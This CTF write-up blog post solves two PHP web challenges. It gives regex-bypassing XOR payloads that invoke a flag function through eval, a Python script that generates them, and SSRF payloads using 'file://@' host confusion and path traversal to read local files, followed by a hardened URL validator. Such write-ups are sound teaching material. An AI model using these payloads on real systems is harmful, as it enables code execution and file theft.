NEKO

xman-2018

2018/08/08

**

<?php
include 'flag.php';
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>40){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9]+/",$code)){
        die("NO.");
    }
    @eval($code);
}else{
    highlight_file(__FILE__);
}
//$hint = "php function getFlag() to get flag";
?>

Reference: https://www.cnblogs.com/ECJTUACM-873284962/p/9433641.html
That article's analysis is good, but it has a few small problems. For example, the payload can be simplified to:

?code=$_="`{{{"^"?<>/";${$_}[_]();&_=getFlag

It is also possible to avoid $_GET entirely; the payload can be written as:

?code=$_=%22%27%25%28%26%2c%21%27%22%5e%22%40%40%5c%60%40%40%40%22;$_();

Before URL encoding:

?code=$_="'%(&,!'"^"@@\`@@@";$_();

where

"'%(&,!'"^"@@\`@@@"="getFlag"

A short Python script can find these characters:

import string

# Candidate characters: ASCII punctuation only, so neither side of the
# XOR contains a letter or digit (the challenge regex rejects those).
punct = string.punctuation
s = 'getFlag'
for i in s:
    for j in punct:
        # Look for a punctuation pair whose XOR gives the target letter.
        if chr(ord(i) ^ ord(j)) in punct:
            print(j + " ^ " + chr(ord(i) ^ ord(j)) + " = " + i)
            break

The output is:

' ^ @ = g
% ^ @ = e
( ^ \ = t
& ^ ` = F
, ^ @ = l
! ^ @ = a
' ^ @ = g

I also tested locally; the payload:

?code=(%22%27%25%28%26%2c%21%27%22%5e%22%40%40%5c%60%40%40%40%22)();

also works, but on the platform this payload did not work, which may be related to the PHP version.

Simple-SSRF

A challenge from the Tianjin camp.

<?php

/*
 * I stored flag.txt at baidu.com
 */

show_source(__FILE__);

if (isset($_GET['url'])) {
    $url = parse_url($_GET['url']);
    if (!$url) {
        die('Can not parse url: ' . $_GET['url']);
    }
    if (substr($_GET['url'], strlen('http://'), strlen('baidu.com')) === 'baidu.com') {
        die('Hey, papi, you have to bypass this!');
    }
    if (
        $url['host'] === 'baidu.com'
    ) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $_GET['url']);
        curl_exec($ch);
        curl_close($ch);
    } else {
        die('Save it, hacker!');
    }
}

payload:

127.0.0.1/1234.php?url=file://@baidu.com/flag.txt

The individual competition also had a similar SSRF, but the payload was:

file://@www.baidu.com/../../../../../../etc/flag.txt#

A # must be appended at the end.
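As an added example (not the challenge code), here is a hardened version of the URL check. The challenge compared a substring of the raw string but then trusted only the parsed host, and the two disagree on `file://@baidu.com/...`; the version below validates the parsed scheme and host, rejects userinfo, and also restricts curl itself to HTTP(S), so a parser disagreement cannot reach the local filesystem. The function names `is_allowed_url` and `fetch_checked` are my own.

```php
<?php
// Added example: hardened replacement for the challenge's URL validation.

function is_allowed_url(string $raw): bool {
    $url = parse_url($raw);
    if ($url === false) {
        return false;
    }
    // Allow only plain web schemes; file://, gopher://, dict:// etc. are rejected.
    if (!isset($url['scheme']) ||
        !in_array(strtolower($url['scheme']), ['http', 'https'], true)) {
        return false;
    }
    // Compare the parsed host, never a substring of the raw input.
    if (!isset($url['host']) || strtolower($url['host']) !== 'baidu.com') {
        return false;
    }
    // "user@host" is a common way to confuse string checks; refuse any userinfo.
    // parse_url() reports an empty user for "file://@baidu.com", so isset() catches it.
    if (isset($url['user']) || isset($url['pass'])) {
        return false;
    }
    return true;
}

function fetch_checked(string $raw) {
    if (!is_allowed_url($raw)) {
        return false;
    }
    $ch = curl_init($raw);
    // Second line of defence: curl refuses any non-HTTP(S) scheme,
    // including on a redirect, regardless of what the parser thought.
    curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body;
}

// Constructed inputs: both challenge payloads are rejected, a normal URL passes.
var_dump(is_allowed_url('file://@baidu.com/flag.txt'));
var_dump(is_allowed_url('file://@www.baidu.com/../../../../../../etc/flag.txt#'));
var_dump(is_allowed_url('http://baidu.com/index.html'));
```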

Original author: n3k0

Published: August 8th 2018, 4:32:48

Rant: I am going to die if I cannot play 魔夜2.
